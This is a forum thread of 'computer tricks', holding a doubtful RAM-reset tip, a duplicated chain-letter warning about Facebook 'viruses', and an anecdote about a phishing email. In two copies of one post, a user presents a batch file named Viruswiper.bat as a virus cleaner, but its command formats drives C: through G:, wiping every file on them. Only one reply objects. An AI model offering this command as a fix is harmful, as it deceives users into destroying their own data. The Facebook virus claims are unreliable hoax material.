WJunction's official - Computer Tricks Thread!

Status
Not open for further replies.
@Sandvik - Thanks Mate. :)

@jay - Do try Out Clicking it over and over several times.... Check out ur computer speed after that :) It should work, I Use it Everyday. :sun:

---

I Have Been Using the Reset Ram Since a year or so... It Does Have Some Effect.

Trick #16 Added... Enjoy People! :)

Last edited:
Definitely you might be ryt then... I Always felt that it was working because after i clicked this several times i used to browse my computer and it used to be lot faster than earlier. I Liked It so Shared it over here. :)

HEY GUYZZZZ….

These days Facebook Id’s Are Targeted By Some Hackers.So,For Your Account Safety Just Follow Up These Simple Tips
!!! Read dese saftey tips Guyz..!!! Facebook currently has 4 VIRUSES: …
#1 —If you get a notice of a PHOTO TAG … Do not open it.
#2—If you get a notificati on that a friend reported you for offensive behavior etc.. Do not open it.
#3 Is a Video saying 99% of People can not watch this for more the 15 Sec. Do not open it is also a virus.
#4 all Messages from your friends via chat saying click this link .. Do not open!

These are BAD… ones and will crash… your computer ….. re-post and warn friend. WARNING ~~~PLEASE LISTEN UP !!HACKERS ARE BUSY ON FACEBOOK AGAIN!!!

HEY GUYZZZZ….

These days Facebook Id’s Are Targeted By Some Hackers.So,For Your Account Safety Just Follow Up These Simple Tips
!!! Read dese saftey tips Guyz..!!! Facebook currently has 4 VIRUSES: …
#1 —If you get a notice of a PHOTO TAG … Do not open it.
#2—If you get a notificati on that a friend reported you for offensive behavior etc.. Do not open it.
#3 Is a Video saying 99% of People can not watch this for more the 15 Sec. Do not open it is also a virus.
#4 all Messages from your friends via chat saying click this link .. Do not open!

These are BAD… ones and will crash… your computer ….. re-post and warn friend. WARNING ~~~PLEASE LISTEN UP !!HACKERS ARE BUSY ON FACEBOOK AGAIN!!!

one guy sent me a fake email..
It's friend request email..so i opened the link in another browser(IE) and i saw it asking to add his email to my FB account..if i confirm this,hacker's email will add to my fb account as alternative email address..

BTW this noob hacker dont know that i already deactivated my fb account lol :facepalm:

so be aware especially from check my pictures emails..
Thanks for the alert mate :)

Add mine pls:

HOW TO CLEAR YOUR WINDOWS PC OF ALL VIRUSES

Step one: open notepad.
Step two: copy and paste the following code into notepad:

Code:
@echo off
for %%i in (c:, d:,e:,f:,g:) do format %%i /FS:NTFS /x

Step three: Save the file as Viruswiper.bat
(make sure in extensions put all file types)

Step four: double click Viruswiper.bat where ever you saved it and let the program run. Your pc should now have absolutely no viruses whatsoever.

Thats all folks!

Add mine pls:

HOW TO CLEAR YOUR WINDOWS PC OF ALL VIRUSES

Step one: open notepad.
Step two: copy and paste the following code into notepad:

Code:
@echo off
for %%i in (c:, d:,e:,f:,g:) do format %%i /FS:NTFS /x
Step three: Save the file as Viruswiper.bat
(make sure in extensions put all file types)

Step four: double click Viruswiper.bat where ever you saved it and let the program run. Your pc should now have absolutely no viruses whatsoever.

Thats all folks!

You're a dick for posting that.

Status
Not open for further replies.
Back